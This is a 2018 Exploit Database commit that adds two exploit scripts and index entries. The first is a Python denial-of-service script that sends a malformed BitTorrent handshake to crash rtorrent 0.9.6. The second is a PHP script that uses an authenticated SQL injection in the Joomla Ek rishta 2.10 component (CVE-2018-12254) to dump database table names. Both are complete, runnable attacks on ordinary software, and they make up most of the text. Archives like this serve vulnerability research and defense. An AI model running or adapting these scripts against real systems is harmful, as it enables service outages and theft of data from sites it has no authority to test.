DB: 2018-06-15

2 changes to exploits/shellcodes

rtorrent 0.9.6 - Denial of Service

Joomla Component Ek rishta 2.10 - SQL Injection
This commit is contained in:
Offensive Security 2018-06-15 05:01:44 +00:00
parent de3b5004b9
commit 1ccdc79fbd
3 changed files with 96 additions and 0 deletions

40
exploits/linux/dos/44894.py Executable file
View file

@ -0,0 +1,40 @@
# Exploit Title: rtorrent 0.9.6 - Denial of Service
# Date: 2018-01-10
# Exploit Author: ecx86
# Vendor Homepage: http://rtorrent.net
# Software Link: https://github.com/rakshasa/rtorrent/releases
# Version: <= 0.9.6
# Tested on: Debian GNU/Linux 9.4 (stretch)
# This crash is due to a bad bencode parse of the handshake data map.
# Specifically, by providing a massive length for a string, namely the key of a map entry,
# malloc fails, returning 0, which is passed to a memcpy call that causes the segfault.
# This can be triggered actively by sending the crash-triggering data to a seeding rtorrent
# client, or when a downloading rtorrent client connects to a malicious peer.
#!/usr/bin/env python
import socket
import struct
crash = ''
proto_name = 'BitTorrent protocol'
crash += chr(len(proto_name)) + proto_name # magic
crash += '00000000' # reserved extension bytes
# sha1 hash of info dictionary
# change this depending on your torrent
crash += '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
crash += '00000000000000000000' # peer id
msg = ''
msg += struct.pack('<H', 20) # message type: extended
msg += 'd99999999999999999999999999999999:' # payload
crash += struct.pack('>I', len(msg))
crash += msg
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('1.3.3.7', 6890))
s.send(crash)
s.close()

View file

@ -0,0 +1,54 @@
# Title: SQL Injection Joomla Component Ek rishta 2.10 - SQL Injection
# Date: 2018-06-14
# Exploit Author: Guilherme Assmann
# Vendor Homepage:https://www.joomla.org/
# Version: 2.10
# Tested on: MacOSX, Safari, Chrome
# Download: https://extensions.joomla.org/extension/ek-rishta/
# CVE: CVE-2018-12254
# Vulnerability Description
# To exploit this vulnerability, the user must be logged on to the platform!
# the vulnerability allows SQL Injection via the
# PATH_INFO to a home/requested_user/Sent%20interest/[username] URI.
# more information(en):
# https://fireshellsecurity.team/cve-2018-12254-sql-injection-joomla-component/
# more information(pt-br): https://m4k4br0.github.io/sql-injection-joomla-component/
# more information: https://desecsecurity.com/
# exploit code to dump tables:
<?php
// CVE-2018-12254
// after dump the tables, use %60%23table_name%60 to dump columns...
$host = $argv[1];
$cookie = $argv[2];
// Usage: php exploit.php [http://[HOST]/](http://[host]/) “Cookie: foo=bar”
function exploit($host,$ck){
$urls = sqli();
$ch = curl_init();
foreach($urls as $url){
curl_setopt($ch,CURLOPT_URL,$host.$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_USERAGENT,":)");
curl_setopt($ch,CURLOPT_HTTPHEADER, [$ck]);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,100);
curl_setopt($ch,CURLOPT_TIMEOUT,100);
$response = curl_exec($ch);
$s = strpos($response,"#__");
echo substr($response,$s,30)."\n";
}
}
function sqli(){
$uri = "/index.php/home/requested_user/Sent%20interest/1'or%20";
for($i=0;$i<100;$i++){
$value = $i+1;
$data[$i] = $uri.str_replace("+","%20",urlencode('extractvalue(0xa,concat(0xa,(select table_name from information_schema.tables where table_schema=database() limit '.$value.',1))) #'));
}
return $data;
}
exploit($host,$cookie);
?>

View file

@ -5998,6 +5998,7 @@ id,file,description,date,author,type,platform,port
44861,exploits/multiple/dos/44861.html,"WebKit - Use-After-Free when Resuming Generator",2018-06-08,"Google Security Research",dos,multiple,
44862,exploits/multiple/dos/44862.txt,"WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
44863,exploits/multiple/dos/44863.txt,"WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -39552,3 +39553,4 @@ id,file,description,date,author,type,platform,port
44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,

Can't render this file because it is too large.